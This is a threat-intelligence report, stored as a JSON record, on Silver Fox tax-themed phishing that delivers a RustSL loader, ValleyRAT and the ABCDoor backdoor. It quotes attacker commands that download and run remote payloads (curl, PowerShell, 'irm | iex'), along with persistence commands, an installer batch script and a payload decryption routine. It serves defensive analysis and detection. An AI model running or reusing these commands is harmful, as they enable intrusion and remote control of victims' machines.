{
	"id": "f9430ef5-ce35-4eb9-b678-4706553cc7a3",
	"created_at": "2026-05-07T02:43:44.048593Z",
	"updated_at": "2026-05-07T02:44:10.993926Z",
	"deleted_at": null,
	"sha1_hash": "40a740cc65981f960ecd5f2ee1450bf00b760d44",
	"title": "Silver Fox uses the new ABCDoor backdoor to target organizations in Russia and India",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2825572,
	"plain_text": "Silver Fox uses the new ABCDoor backdoor to target organizations\r\nin Russia and India\r\nBy Anton Kargin\r\nPublished: 2026-04-30 · Archived: 2026-05-07 02:09:12 UTC\r\nIn December 2025, we detected a wave of malicious emails designed to look like official correspondence from the\r\nIndian tax service. A few weeks later, in January 2026, a similar campaign began targeting Russian organizations.\r\nWe have attributed this activity to the Silver Fox threat group.\r\nBoth waves followed a nearly identical structure: phishing emails were styled as official notices regarding tax\r\naudits or prompted users to download an archive containing a “list of tax violations”. Inside the archive was a\r\nmodified Rust-based loader pulled from a public repository. This loader would download and execute the well-known ValleyRAT backdoor. The campaign impacted organizations across the industrial, consulting, retail, and\r\ntransportation sectors, with over 1600 malicious emails recorded between early January and early February.\r\nDuring our investigation, we also discovered that the attackers were delivering a new ValleyRAT plugin to victim\r\ndevices, which functioned as a loader for a previously undocumented Python-based backdoor. We have named this\r\nbackdoor ABCDoor. 
Retrospective analysis reveals that ABCDoor has been part of the Silver Fox arsenal since at\r\nleast late 2024 and has been utilized in real-world attacks from the first quarter of 2025 to the present day.\r\nEmail campaign\r\nIn the January campaign, victims received an email purportedly from the tax service with an attached PDF file.\r\nPhishing email sent to victims in Russia\r\nThe PDF contained two clickable links to download an archive, both leading to a malicious website:\r\nabc.haijing88[.]com/uploads/фнс/фнс.zip.\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 1 of 30\n\nContents of the PDF file from the January phishing wave\r\nContents of the фнс.zip archive\r\nIn the December campaign, the malicious code was embedded directly within the files attached to the email.\r\nPhishing email sent to victims in India\r\nThe email shown in the screenshot above was sent via the SendGrid cloud platform and contained an archive\r\nnamed ITD.-.rar. Inside was a single executable file, Click File.exe, with an Adobe PDF icon (the RustSL\r\nloader).\r\nContents of ITD.-.rar\r\nAdditionally, in late December, emails were distributed with an attachment titled GST.pdf containing two links\r\nleading to hxxps://abc.haijing88[.]com/uploads/印度邮箱/CBDT.rar. (印度邮箱 translates from Chinese as\r\n“Indian mailbox”).\r\nPDF file from the phishing email\r\nBoth versions of the campaign attempt to exploit the perceived importance of tax authority correspondence to\r\nconvince the victim to download the document and initiate the attack chain. 
The method of using download links\r\nwithin a PDF is specifically designed to bypass email security gateways; since the attached document only\r\ncontains a link that requires further analysis, it has a higher probability of reaching the recipient compared to an\r\nattachment containing malicious code.\r\nRustSL loader\r\nThe attackers utilized a modified version of a Rust-based loader called RustSL, whose source code is publicly\r\navailable on GitHub with a description in Chinese:\r\nScreenshot of the description from the RustSL loader GitHub project\r\nThe description also refers to RustSL as an antivirus bypass framework, as it features a builder with extensive\r\ncustomization options:\r\nEight payload encryption methods\r\nThirteen memory allocation methods\r\nTwelve sandbox and virtual machine detection techniques\r\nThirteen payload execution methods\r\nFive payload encoding methods\r\nFurthermore, the original version of RustSL encrypts all strings by default and inserts junk instructions to\r\ncomplicate analysis.\r\nThe Silver Fox APT group first began using a modified version of RustSL in late December 2025.\r\nSilver Fox RustSL\r\nThis section examines the key changes the Silver Fox group introduced to RustSL. We will refer to this\r\ncustomized version as Silver Fox RustSL to distinguish it from the original.\r\nThe steganography.rs module\r\nThe attackers added a module named steganography.rs to RustSL. 
Despite the name, it has little to do with actual\r\nsteganography; instead, it implements the unpacking logic for the malicious payload.\r\nThe usage of the new module within the Silver Fox RustSL code\r\nThe threat actors also modified the RustSL builder to support the new format and payload packing.\r\nThe attackers employed several methods to deliver the encrypted malicious payload. In December, we observed\r\nfiles being downloaded from remote hosts followed by delivery within the loader itself. Later, the attackers shifted\r\nalmost entirely to placing the malicious payload inside the same archive as the loader, disguised as a standalone\r\nfile with extensions like PNG, HTM, MD, LOG, XLSX, ICO, CFG, MAP, XML, or OLD.\r\nEncrypted malicious payload format\r\nThe encrypted payload file delivered by the Silver Fox RustSL loader followed this structure:\r\n\u003cRSL_START\u003ersl_encrypted_payload\u003cRSL_END\u003e\r\nIf additional payload encoding was selected in the builder, the loader would decode the data before proceeding\r\nwith decryption.\r\nThe rsl_encrypted_payload followed this specific format:\r\nchar sha256_hash[32]; // decrypted payload hash\r\nDWORD enc_payload_len;\r\nWORD sgn_decoder_size;\r\nchar sgn_iterations;\r\nchar sgn_key;\r\nchar decoder[sgn_decoder_size];\r\nchar enc_payload[enc_payload_len];\r\nBelow is a description of the data blocks contained within it:\r\nsha256_hash: the hash of the decrypted payload. 
After decryption, the loader calculates the SHA256 hash\r\nand compares it against this value; if they do not match, the process terminates.\r\nenc_payload_len: the size of the encrypted payload\r\nsgn_iterations and sgn_key: parameters used for decryption\r\nsgn_decoder_size and decoder: unused fields\r\nenc_payload: the primary payload\r\nNotably, the new proprietary steganography.rs module was implemented using the same logic as the public\r\nRustSL modules (such as ipv4.rs, ipv6.rs, mac.rs, rc4.rs, and uuid.rs in the decrypt directory). It utilized a similar\r\npayload structure where the first 32 bytes consist of a SHA-256 hash and the payload size.\r\nTo decrypt the malicious payload, steganography.rs employed a custom XOR-based algorithm. Below is an\r\nequivalent implementation in Python:\r\ndef decrypt(data: bytes, sgn_key: int, sgn_iterations: int) -\u003e bytes:\r\n    buf = bytearray(data)\r\n    xor_key = sgn_key \u0026 0xFF\r\n    for _ in range(sgn_iterations):\r\n        k = xor_key\r\n        for i in range(len(buf)):\r\n            dec = buf[i] ^ k\r\n            if k \u0026 1:\r\n                k = (dec ^ ((k \u003e\u003e 1) ^ 0xB8)) \u0026 0xFF\r\n            else:\r\n                k = (dec ^ (k \u003e\u003e 1)) \u0026 0xFF\r\n            buf[i] = dec\r\n    return bytes(buf)\r\nThe unpacking process consists of the following stages:\r\n1. Extraction of rsl_encrypted_payload. The loader extracts the encrypted payload body located between the\r\n\u003cRSL_START\u003e and \u003cRSL_END\u003e markers.\r\nOriginal file containing the encrypted malicious payload\r\n2. XOR decryption with a hardcoded key. Most loaders used the hardcoded key RSL_STEG_2025_KEY.\r\n3. 
Payload decoding occurs if the corresponding setting was enabled in the builder. The GitHub version of\r\nthe builder offers several encoding options: Base64, Base32, Hex, and urlsafe_base64. Silver Fox utilized\r\neach option at least once. Base64 was the most frequent choice, followed by Hex and Base32, with\r\nurlsafe_base64 appearing in a few samples.\r\nEncrypted malicious payload prior to the final decryption stage\r\n4. Decryption of the final payload using a multi-pass XOR algorithm that modifies the key after each\r\niteration (as demonstrated in the Python algorithm provided above).\r\nThe guard.rs module\r\nAnother module added to Silver Fox RustSL is guard.rs. It implements various environment checks and country-based geofencing.\r\nIn the earliest loader samples from late December 2025, the Silver Fox group utilized every available method for\r\ndetecting virtual machines and sandboxes, while also verifying if the device was located in a target country. In\r\nlater versions, the group retained only the geolocation check; however, they expanded both the list of countries\r\nallowed for execution and the services used for verification.\r\nThe GitHub version of the loader only includes China in its country list. In customized Silver Fox loaders built\r\nprior to January 19, 2026, this list included India, Indonesia, South Africa, Russia, and Cambodia. 
Starting with a\r\nsample dated January 19, 2026 (MD5: e6362a81991323e198a463a8ce255533), Japan was added to the list.\r\nTo determine the host country, Silver Fox RustSL sends requests to five public services:\r\nip-api.com (the GitHub version relies solely on this service)\r\nipwho.is\r\nipinfo.io\r\nipapi.co\r\nwww.geoplugin.net\r\nPhantom Persistence\r\nWe discovered that a loader compiled on January 7, 2026 (MD5: 2c5a1dd4cb53287fe0ed14e0b7b7b1b7), began to\r\nuse the recently documented Phantom Persistence technique to establish persistence. This method abuses\r\nfunctionality designed to allow applications requiring a reboot for updates to complete the installation process\r\nproperly. The attackers intercept the system shutdown signal, halt the normal shutdown sequence, and trigger a\r\nreboot under the guise of an update for the malware. Consequently, the loader forces the system to execute it upon\r\nOS startup. 
This specific sample was compiled in debug mode and logged its activity to rsl_debug.log, where we\r\nidentified strings corresponding to the implementation of the Phantom Persistence technique:\r\n[unix_timestamp] God-Tier Telemetry Blinding: Deployed via HalosGate Indirect Syscalls.\r\n[unix_timestamp] RSL started in debug mode.\r\n[unix_timestamp] ==========================================\r\n[unix_timestamp]     Phantom Persistence Module (Hijack Mode)\r\n[unix_timestamp] ==========================================\r\n[unix_timestamp] [*] Calling RegisterApplicationRestart...\r\n[unix_timestamp] [+] RegisterApplicationRestart succeeded.\r\n[unix_timestamp] [*] Note: This API mainly works for application crashes, not for user-initiated shutdowns.\r\n[unix_timestamp] [*] For full persistence, you need to trigger the shutdown hijack logic.\r\n[unix_timestamp] [*] Starting message thread to monitor shutdown events...\r\n[unix_timestamp] [+] SetProcessShutdownParameters (0x4FF) succeeded.\r\n[unix_timestamp] [+] Window created successfully, message loop started.\r\n[unix_timestamp] [+] Phantom persistence enabled successfully.\r\n[unix_timestamp] [*] Hijack logic: Shutdown signal -\u003e Abort shutdown -\u003e Restart with EWX_RESTARTAPPS.\r\n[unix_timestamp] Phantom persistence enabled.\r\n[unix_timestamp] Mouse movement check passed.\r\n[unix_timestamp] IP address check passed.\r\n[unix_timestamp] Pass Sandbox/VM detection.\r\nAttack chain and payloads\r\nDuring this phishing campaign, Silver Fox utilized two primary methods for delivering malicious archives:\r\nAs an email attachment\r\nVia a link to an external attacker-controlled website contained within a PDF attachment\r\nWe also observed three different ways the payload was positioned relative to the loader:\r\nEmbedded 
within the loader body\r\nHosted on an external website as a PNG image\r\nPlaced within the same archive as the loader\r\nThe diagram below illustrates the attack chain using the example of an email containing a PDF file and the\r\nsubsequent delivery of a malicious payload from an external attacker-controlled website.\r\nAttack chain of the campaign utilizing the RustSL loader\r\nThe infection chain begins when the user runs an executable file (the Silver Fox modification of the RustSL\r\nloader) disguised with a PDF or Excel icon. RustSL then loads an encrypted payload, which functions as\r\nshellcode. This shellcode then downloads an encrypted ValleyRAT (also known as Winos 4.0) backdoor module\r\nnamed 上线模块.dll from the attackers’ server. The filename translates from Chinese as “online-module.dll”, so\r\nfor the sake of clarity, we’ll refer to it as the Online module.\r\nBeginning of the decrypted payload: shellcode for loading the ValleyRAT (Winos 4.0) Online module\r\nThe Online module proceeds to load the core component of ValleyRAT: the Login module (the original filename\r\n登录模块.dll_bin translates from Chinese as “login-module.dll_bin”). This module manages C2 server\r\ncommunication, command execution, and the downloading and launching of additional modules.\r\nThe initial shellcode, as well as the Online and Login modules, utilize a configuration located at the end of the\r\nshellcode:\r\nEnd of the decrypted payload: ValleyRAT (Winos 4.0) configuration\r\nThe values between the “|” delimiters are written in reverse order. 
By restoring the correct character sequence, we\r\nobtain the following string:\r\n|p1:207.56.138[.]28|o1:6666|t1:1|p2:127.0.0.1|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:飘诈|bb:1.0|bz:2025.11.16|jp:0|bh:0|ll:0|dl:0|sh:0|kl:0|bd:0|\r\nThe key configuration parameters in this string are:\r\np#, o#: IP addresses and ports of the ValleyRAT C2 servers in descending order of priority\r\nbz: the creation date of the configuration\r\nThe Silver Fox group has long employed the infection chain described above – from the encrypted shellcode\r\nthrough the loading of the Login module – to deploy ValleyRAT. This procedure and its configuration parameters\r\nare documented in detail in industry reports: (1, 2, and 3).\r\nOnce the Login module is running, ValleyRAT enters command-processing mode, awaiting instructions from the\r\nC2. These commands include the retrieval and execution of various additional modules.\r\nValleyRAT utilizes the registry to store its configurations and modules:\r\nRegistry key | Description\r\nHKCU:\\Console\\0 | For x86-based modules\r\nHKCU:\\Console\\1 | For x64-based modules\r\nHKCU:\\Console\\IpDate | Hardcoded registry location checked upon Login module startup\r\nHKCU:\\Software\\IpDates_info | Final configuration\r\nThe ValleyRAT builder leaked in March 2025 contained 20 primary and over 20 auxiliary modules. During this\r\nspecific phishing campaign, we discovered that after the main module executed, it loaded two previously unseen\r\nmodules with similar functionality. These modules were responsible for downloading and launching a previously\r\nundocumented Python-based backdoor we have dubbed ABCDoor.\r\nCustom ValleyRAT modules\r\nThe discovered modules are named 保86.dll and 保86.dll_bin. 
Their parameters are detailed in the table below.\r\nHKCU:\\Console\\0 registry key value | Module name | Library MD5 hash | Compiled date and time (UTC)\r\nfc546acf1735127db05fb5bc354093e0 | 保86.dll | 4a5195a38a458cdd2c1b5ab13af3b393 | 2025-12-04 04:34:31\r\nfc546acf1735127db05fb5bc354093e0 | 保86.dll | e66bae6e8621db2a835fa6721c3e5bbe | 2025-12-04 04:39:32\r\n2375193669e243e830ef5794226352e7 | 保86.dll_bin | e66bae6e8621db2a835fa6721c3e5bbe | 2025-12-04 04:39:32\r\nOf particular note is the PDB path found in all identified modules:\r\nC:\\Users\\Administrator\\Desktop\\bat\\Release\\winos4.0测试插件.pdb. In Chinese, 测试插件 translates to “test\r\nplugin”, which may suggest that these modules are still in development.\r\nUpon execution, the 保86.dll module determines the host country by querying the same five services used by the\r\nguard.rs module in Silver Fox RustSL: ipinfo.io, ip-api.com, ipapi.co, ipwho.is, and geoplugin.net. For the module\r\nto continue running, the infected device must be located in one of the following countries:\r\nCountries where the 保86.dll module functions\r\nIf the geolocation check passes, the module attempts to download a 52.5 MB archive from a hardcoded address\r\nusing several methods. The sample with MD5 4a5195a38a458cdd2c1b5ab13af3b393 queried\r\nhxxp://154.82.81[.]205/YD20251001143052.zip, while the sample with MD5\r\ne66bae6e8621db2a835fa6721c3e5bbe queried\r\nhxxp://154.82.81[.]205/YN20250923193706.zip.\r\nInterestingly, Silver Fox updated the YD20251001143052.zip archive multiple times but continued to host it on\r\nthe same C2 (154.82.81[.]205) without changing the filename.\r\nThe module implements the following download methods:\r\n1. Using the InternetReadFile function with the User-Agent PythonDownloader\r\n2. Using the URLDownloadToFile function\r\n3. 
Using PowerShell:\r\npowershell.exe -Command \"\u0026 {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $ProgressPreference = 'SilentlyContinue'; try { Invoke-WebRequest -Uri 'hxxp://154.82.81[.]205/YD20251001143052.zip' -OutFile '$appdata\\appclient\\111.zip' -UseBasicParsing -TimeoutSec 600 } catch { exit 1 } }\"\r\n4. Using curl:\r\ncurl.exe -L -o \"%LOCALAPPDATA%\\appclient\\111.zip\" \"hxxp://154.82.81[.]205/YD20251001143052.zip\" --silent --show-error --insecure --max-time 600\r\nThe archive was saved to the path %LOCALAPPDATA%\\appclient\\111.zip.\r\nContents of the 111.zip archive\r\nThe archive is quite large because the python directory contains a Python environment with the packages required\r\nto run the previously unknown ABCDoor backdoor (which we will describe in the next section), while the ffmpeg\r\ndirectory includes ffmpeg.exe, a statically linked, legitimate audio/video tool that the backdoor uses for screen\r\ncapturing.\r\nOnce downloaded, the DLL module extracts the archive using COM methods and runs the following command to\r\nexecute update.bat:\r\ncmd.exe /c \"C:\\Users\\\u003cuser\u003e\\AppData\\Local\\appclient\\update.bat\"\r\nThe update.bat script copies the extracted files to C:\\ProgramData\\Tailscale. This path was chosen intentionally: it\r\ncorresponds to the legitimate utility Tailscale (a mesh VPN service based on the WireGuard protocol that connects\r\ndevices into a single private network). 
By mimicking a VPN service, the attackers likely aim to mask their\r\npresence and complicate the analysis of the compromised system.\r\n@echo off\r\nset \"script_dir=%~dp0\"\r\nset SRC_DIR=%script_dir%\r\nset DES_DIR=C:\\ProgramData\\Tailscale\r\nrmdir /s /q \"%DES_DIR%\"\r\nmkdir \"%DES_DIR%\"\r\ncall :recursiveCopy \"%SRC_DIR%\" \"%DES_DIR%\"\r\nstart \"\" /B \"%DES_DIR%\\python\\pythonw.exe\" -m appclient\r\nexit /b\r\n:recursiveCopy\r\nset \"src=%~1\"\r\nset \"dest=%~2\"\r\nif not exist \"%dest%\" mkdir \"%dest%\"\r\nfor %%F in (\"%src%\\*\") do (\r\n    copy \"%%F\" \"%dest%\" \u003enul\r\n)\r\nfor /d %%D in (\"%src%\\*\") do (\r\n    call :recursiveCopy \"%%D\" \"%dest%\\%%~nxD\"\r\n)\r\nexit /b\r\nContents of update.bat\r\nAfter copying the files, the script launches the appclient Python module using the legitimate pythonw tool:\r\nstart \"\" /B \"%DES_DIR%\\python\\pythonw.exe\" -m appclient\r\nABCDoor Python backdoor\r\nThe primary entry point for the appclient module, the __main__.py file, contains only a few lines of code. These\r\nlines are responsible for utilizing the setproctitle library and executing the run function, to which the C2 address is passed as a parameter.\r\nCode for __main__.py: the module entry point\r\nThe setproctitle library is primarily used on Linux or macOS systems to change a displayed process name.\r\nHowever, its functionality is significantly limited on Windows; rather than changing the process name itself, it\r\ncreates a named object in the format python(\u003cpid\u003e): \u003cproctitle\u003e. 
For example, for the appclient module, this\r\nobject would appear as follows:\r\n\\Sessions\\1\\BaseNamedObjects\\python(8544): AppClientABC\r\nWe believe the use of setproctitle may indicate the existence of backdoor versions for non-Windows systems, or at\r\nleast plans to deploy it in such environments.\r\nThe appclient.core module has a PYD extension and is a DLL file compiled with Cython 3.0.7. This is the core\r\nmodule of the backdoor, which we have named ABCDoor because nearly all identified C2 addresses featured the\r\nthird-level domain abc.\r\nUpon execution, the backdoor establishes persistence in the following locations:\r\n1. Windows registry: It adds \"\u003cpath_to_pythonw.exe\u003e\" -m appclient to the value\r\nHKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run:AppClient, e.g.:\r\n\"C:\\Users\\\u003cusername\u003e\\AppData\\Local\\appclient\\python\\pythonw.exe\" -m appclient\r\nPersistence is established by executing the following command:\r\ncmd.exe /c \"reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"AppClient\" /t REG_SZ /d \"\\\"\u003cpath_to_pythonw.exe\u003e\\\" -m appclient\" /f\"\r\n2. Task scheduler: The malware executes\r\ncmd.exe /c \"schtasks /create /sc minute /mo 1 /tn \"AppClient\" /tr \"\u003cpath_to_pythonw.exe\u003e -m appclient\" /f\"\r\nThe command creates a task named “AppClient” that runs every minute.\r\nThe backdoor is built on the asyncio and Socket.IO Python libraries. It communicates with its C2 via HTTPS and\r\nuses event handlers to process messages asynchronously. 
The backdoor follows object-oriented programming\r\nprinciples and includes several distinct classes:\r\nMainManager: handles C2 connection and authorization (sending system metadata)\r\nMessageManager: registers and executes message handlers\r\nAutoStartManager: manages backdoor persistence\r\nClientManager: handles backdoor updates and removal\r\nSystemInfoManager: collects data from the victim’s system, including screenshots\r\nRemoteControlManager: enables remote mouse and keyboard control via the pynput library and manages\r\nscreen recording (using the ScreenRecorder child class)\r\nFileManager: performs file system operations\r\nKeyboardManager: emulates keyboard input\r\nProcessManager: manages system processes\r\nClipboardManager: exfiltrates clipboard contents to the C2\r\nCryptoManager: provides functions for encrypting and decrypting files and directories (currently limited to\r\nDPAPI; asymmetric encryption functions lack implementation)\r\nUtils: auxiliary functions (file upload/download, archive management, error log uploading, etc.)\r\nBackdoor strings with characteristic names\r\nUpon connecting, ABCDoor sends an auth message to the C2 with the following information in JSON format:\r\n\"role\": \"client\",\r\n\"device_info\": {\r\n\"device_name\": device_name,\r\n\"os_name\": os_name,\r\n\"os_version\": os_version,\r\n\"os_release\": os_release,\r\n\"device_id\": device_id,\r\n\"install_channel\": \"\u003cchannel_name_from_registry\u003e\", # optional field\r\n\"first_install_time\": \"\u003cinstall_time_from_registry\u003e\", # optional field\r\n},\r\n\"version\": 157 # hard-coded ABCDoor version\r\nThe code for retrieving the device identifier (device_id) in the backdoor is somewhat peculiar:\r\ndevice_id = Utility.get_machine_guid_via_file_func()\r\ndevice_id = 
Utility.get_machine_guid_via_reg()\r\nFirst, the get_machine_guid_via_file_func function attempts to read an identifier from the file\r\n%LOCALAPPDATA%\\applogs\\device.log. If the file does not exist, it is created and initialized with a random\r\nUUID4 value. However, immediately after this, the get_machine_guid_via_reg function overwrites the identifier\r\nobtained by the first function with the value from HKLM:\\SOFTWARE\\Microsoft\\Cryptography:MachineGuid.\r\nThis likely indicates a bug in the code.\r\nThe primary characteristic of this backdoor is the absence of typical remote control features, such as creating a\r\nremote shell or executing arbitrary commands. Instead, it implements two alternative methods for manipulating\r\nthe infected device:\r\nEmulating a double click while broadcasting the victim’s screen\r\nA \"file_open\" message within the FileManager class, which calls the os.startfile function. This\r\nexecutes a specified file using the ShellExecute function and the default handler for that file extension\r\nFor screen broadcasting, the backdoor utilizes a standalone ffmpeg.exe file included in the ABCDoor archive.\r\nWhile early versions could only stream from a single monitor, recent iterations have introduced support for\r\nstreaming up to four monitors simultaneously using the Desktop Duplication API (DDA). The broadcasting\r\nprocess relies on the screen capture functions\r\nRemoteControl::ScreenRecorder::start_single_monitor_ddagrab,\r\nRemoteControl::ScreenRecorder::start_multi_monitor_ddagrab, and\r\nRemoteControl::ScreenRecorder::test_ddagrab_support. 
These functions generate a lengthy string of launch\r\narguments for ffmpeg; these arguments account for monitor orientation (vertical or horizontal) and quantity,\r\nstitching the data into a single, cohesive stream.\r\nBecause ABCDoor runs within a legitimate pythonw.exe process, it can remain hidden on a victim’s system for\r\nextended periods. However, its operation involves various interactions with the registry and file system that can be\r\nused for detection. Specifically, ABCDoor:\r\nWrites its initial installation timestamp to the registry value HKCU:\\Software\\CarEmu:FirstInstallTime\r\nCreates the directory and file %LOCALAPPDATA%\\applogs\\device.log to store the victim’s ID\r\nLogs any exceptions to %LOCALAPPDATA%\\applogs\\exception_logs.zip. Interestingly, Silver Fox even\r\nimplemented a Utility::upload_exception_logs function to send this archive to a specified URI, likely\r\nto help debug and refine the malware’s performance\r\nAdditionally, ABCDoor features self-update and self-deletion capabilities that generate detectable artifacts.\r\nUpdates are downloaded from a specific URI to %TEMP%\\tmpXXXXXXXX\\update.zip (where XXXXXXXX\r\nrepresents random alphanumeric characters), extracted to %TEMP%\\tmpXXXXXXXX\\update, and executed via a\r\nPowerShell command:\r\npowershell -Command \"Start-Sleep -Seconds 5; Start-Process -FilePath \\\"%TEMP%\\tmpXXXXXXXX\\update\\update.ps1\\\" -ArgumentList \\\"%LOCALAPPDATA%\\appclient\\\" -WindowStyle Hidden\"\r\nThe existing ABCDoor process is then forcibly terminated.\r\nABCDoor versions\r\nThrough retrospective analysis, we discovered that the earliest version of ABCDoor (MD5:\r\n5b998a5bc5ad1c550564294034d4a62c) surfaced in late 2024. 
The backdoor evolved rapidly throughout 2025.\r\nThe table below outlines the primary stages of its evolution:\r\nVersion | Compiled date (UTC) | Key updates | ABCDoor .pyd MD5 hash\r\n121 | 2024.12.19 18:27:11 | Minimal functionality (file downloads, remote control using the Graphics Device Interface (GDI) in ffmpeg); no OOP used; registry persistence | 5b998a5bc5ad1c550564294034d4a62c\r\n143 | 2025.02.04 01:15:00 | Client updates; task scheduler persistence; OOP implementation (classes); clipboard management; process management; asymmetric file and directory encryption | c50c980d3f4b7ed970f083b0d37a6a6a\r\n152 | 2025.04.01 15:39:36 | DPAPI encryption functions; chunked file uploading to C2 | de8f0008b15f2404f721f76fac34456a\r\n154 | 2025.05.09 13:36:24 | Implementation of installation channels; key combination emulation | 9bf9f635019494c4b70fb0a7c0fb53e4\r\n156 | 2025.08.11 13:36:10 | Retrieval and logging of initial installation time to the registry | a543b96b0938de798dd4f683dd92a94a\r\n157 | 2025.08.28 14:23:57 | Use of DDA source in ffmpeg for monitor screen broadcasting | fa08b243f12e31940b8b4b82d3498804\r\n157 | 2025.09.23 11:38:17 | Compiled with Cython 3.0.7 (previous version used Cython 3.0.12) | 13669b8f2bd0af53a3fe9ac0490499e5\r\nEvolution of ABCDoor distribution methods\r\nAlthough the first version of the backdoor appeared in late 2024, the threat actor likely began using it in attacks\r\naround February or March 2025. At that time, the backdoor was distributed using stagers written in C++ and Go:\r\nC++ stager: The file GST Suvidha.exe (MD5: 04194f8ddd0518fd8005f0e87ae96335) downloaded a\r\nloader (MD5: f15a67899cfe4decff76d4cd1677c254) from hxxps://mcagov[.]cc/download.php?type=exe. 
This loader then downloaded the ABCDoor archive from hxxps://abc.fetish-friends[.]com/uploads/appclient.zip, extracted it, and executed it.\r\nGo stager: The file GSTSuvidha.exe (MD5: 11705121f64fa36f1e9d7e59867b0724) executed a\r\nremote PowerShell script:\r\npowershell.exe -Command \"irm hxxps://abc.fetish-friends[.]com/setup/install | iex\"\r\nThis script downloaded the ABCDoor archive and launched it.\r\nLater, from May to August 2025, Silver Fox varied their delivery techniques through several methods:\r\nUtilizing TinyURL: Stagers initially queried TinyURL links, which then redirected to the full\r\naddresses for downloading the next stage:\r\nhxxps://tinyurl[.]com/4nzkync8 -\u003e hxxps://roldco[.]com/api/download/c51bbd17-ef08-4d6c-ab4c-d7bf49483dd6\r\nhxxps://tinyurl[.]com/bde63yuu -\u003e hxxps://sudsmama[.]com/api/download/c8ea0a2c-42c2-4159-9337-ee774ed5e7cb\r\nUtilizing URLs with arguments formatted as channel=[word_MMDD]:\r\nhxxps://abc.fetish-friends[.]com/setup?channel=jiqi_0819\r\nhxxps://abc.fetish-friends[.]com/setup/install?channel=whatsapp_0826\r\nhxxps://abc.fetish-friends[.]com/setup/install?channel=dianhua-0903\r\nThanks to these “channel” names, we identified overlaps between ABCDoor and other malicious files likely\r\nbelonging to Silver Fox. These are NSIS installers featuring the branding of the Ministry of Corporate Affairs of\r\nIndia (responsible for regulating industrial companies and the services sector). These installers establish a\r\nconnection to the attackers’ server at hxxps://vnc.kcii2[.]com, providing them with remote access to the victim’s\r\ndevice. 
Below is the list of files we identified:\r\nRemoteInstaller_20250803165259_whatsapp.exe (MD5: 4d343515f4c87b9a2ffd2f46665d2d57)\r\nRemoteInstaller_20250806_004447_jiqi.exe (MD5: dfc64dd9d8f776ca5440c35fef5d406e)\r\nRemoteInstaller_20250808_174554_dianhua.exe (MD5: eefc28e9f2c0c0592af186be8e3570d2)\r\nMCA-Ministry.exe (MD5: 6cf382d3a0eae57b8baaa263e4ed8d00)\r\nMCA-Ministry.exe (MD5: 32407207e9e9a0948d167dca96c41d1a)\r\nMCA-Ministry.exe (MD5: d17caf6f5d6ba3393a3a865d1c43c3d2)\r\nThe file MCA-Ministry.exe (MD5: 32407207e9e9a0948d167dca96c41d1a) was also hosted on one of the servers\r\nused by the ABCDoor stagers and was downloaded via TinyURL:\r\nhxxps://tinyurl[.]com/322ccxbf -\u003e hxxps://sudsmama.com/api/download/50e24b3a-8662-4d2f-9837-8cc62aa8f697\r\nStarting in November 2025, the attackers began using a JavaScript loader to deliver ABCDoor. This was\r\ndistributed via self-extracting (SFX) archives, which were further packaged inside ZIP archives:\r\nCBDT.zip (MD5: 6495c409b59deb72cfcb2b2da983b3bb) (Related material.exe)\r\nNovember Statement.zip (MD5: b500e0a8c87dffe6f20c6e067b51afbf) (BillReceipt.exe)\r\nDecember Statement.zip (MD5: 814032eec3bc31643f8faa4234d0e049) (statement.exe)\r\nDecember Statement.zip (MD5: 90257aa1e7c9118055c09d4a978d4bee) (statement verify.exe)\r\nStatement of Account.zip (MD5: f8371097121549feb21e3bcc2eeea522) (Review the file.exe)\r\nThe ZIP archives were likely distributed through phishing emails. 
They contained one of two SFX files:\r\nBillReceipt.exe (MD5: 2b92e125184469a0c3740abcaa10350c) or Review the file.exe (MD5: 043e457726f1bbb6046cb0c9869dbd7d), which differed only in their icons.\r\nIcons of the SFX archives\r\nWhen executed, the SFX archive ran the following script:\r\nSFX archive script\r\nThis script launched run_direct.ps1, a PowerShell script contained within the archive.\r\nThe run_direct.ps1 script\r\nThe run_direct.ps1 script checked for the presence of NodeJS in the standard directory on the victim’s computer\r\n(%USERPROFILE%\\.node\\node.exe). If it was not found, the script downloaded the official NodeJS version\r\n22.19.0, extracted it to that same folder, and deleted the archive. It then executed run.deobfuscated.obf.js – also\r\nlocated in the SFX archive – using the identified (or newly installed) NodeJS, passing two parameters to it: an\r\nencrypted configuration string and an XOR key for decryption:\r\nDecrypted configuration for the JS loader\r\nThe JS code being executed is heavily obfuscated (likely using obfuscate.io). Upon execution, it writes the\r\nchannel parameter value from the configuration to the registry at HKCU:\\Software\\CarEmu:InstallChannel as a\r\nREG_SZ type. It then downloads an archive from the link specified in the zipUrl parameter and saves it to\r\n%TEMP%\\appclient_YYYYMMDDHHMMSS.zip (or /tmp on Linux). The script extracts this archive to the\r\n%USERPROFILE%\\AppData\\Local\\appclient directory (%HOME%/AppData/Local/appclient on Linux) and\r\nlaunches it by running cmd /c start /min python/pythonw.exe -m appclient in background mode with a\r\nhidden window. 
After extraction, the script deletes the ZIP archive.\r\nAdditionally, the code calls a console logging function after nearly every action, describing the operations in\r\nChinese:\r\nLog fragments gathered from throughout the JS code\r\nVictims\r\nAs previously mentioned, Silver Fox RustSL loaders are configured to operate in specific countries: Russia, India,\r\nIndonesia, South Africa, and Cambodia. The most recent versions of RustSL have also added Japan to this list.\r\nAccording to our telemetry, users in all of these countries – with the exception of Cambodia – have encountered\r\nRustSL. We observed the highest number of attacks in India, Russia, and Indonesia.\r\nDistribution of RustSL loader attacks by country, as a percentage of the total number of detections\r\nThe majority of loader samples we discovered were contained within archives with tax-related filenames.\r\nConsequently, we can attribute these attacks to a single campaign with a high degree of confidence. That Silver\r\nFox has been sending emails on behalf of the tax authorities in Japan has also been reported by our industry peers.\r\nConclusion\r\nIn the campaign described in this post, attackers exploited user trust in official tax authority communications by\r\ndisguising malicious files as documents on tax violations. This serves as another reminder of the critical need for\r\nvigilance and the thorough verification of all emails, even those purportedly from authoritative sources. We\r\nrecommend that organizations improve employee security awareness through regular training and educational\r\ncourses.\r\nDuring these attacks, we observed the use of both established Silver Fox tools, such as ValleyRAT, and new\r\nadditions – including a customized version of the RustSL loader and the previously 